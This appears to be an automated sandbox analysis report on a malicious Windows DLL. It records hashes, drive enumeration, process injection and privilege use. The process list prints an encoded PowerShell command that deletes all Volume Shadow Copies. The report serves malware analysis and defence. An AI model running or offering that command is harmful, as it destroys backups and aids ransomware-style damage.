Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
01-02-2022 12:54
Static task
static1
Behavioral task
behavioral1
Sample
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
Resource
win10v2004-en-20220113
General
-
Target
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
-
Size
164KB
-
MD5
722e15d85827d3ac13e56e8108688012
-
SHA1
cab935a24d7d0ea7e8d93851f7ea94ab9bccfc34
-
SHA256
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1
-
SHA512
59e24cf313db4413f44f16a8276d072f43402e718c25e1d00e81ddc69a1937473cfd1902c320bc9175d75a0d43a53ab3e971b8447ec1cf9cf9aa3aa536464273
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 1624 rundll32.exe 960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 960 powershell.exe Token: SeBackupPrivilege 928 vssvc.exe Token: SeRestorePrivilege 928 vssvc.exe Token: SeAuditPrivilege 928 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1744 wrote to memory of 1624 1744 rundll32.exe rundll32.exe PID 1624 wrote to memory of 960 1624 rundll32.exe powershell.exe PID 1624 wrote to memory of 960 1624 rundll32.exe powershell.exe PID 1624 wrote to memory of 960 1624 rundll32.exe powershell.exe PID 1624 wrote to memory of 960 1624 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/960-55-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmpFilesize
8KB
-
memory/960-57-0x0000000002660000-0x0000000002762000-memory.dmpFilesize
1.0MB
-
memory/960-58-0x0000000002762000-0x0000000002764000-memory.dmpFilesize
8KB
-
memory/960-59-0x0000000002764000-0x0000000002767000-memory.dmpFilesize
12KB
-
memory/960-56-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmpFilesize
11.4MB
-
memory/960-60-0x000000000276B000-0x000000000278A000-memory.dmpFilesize
124KB
-
memory/1624-54-0x0000000075761000-0x0000000075763000-memory.dmpFilesize
8KB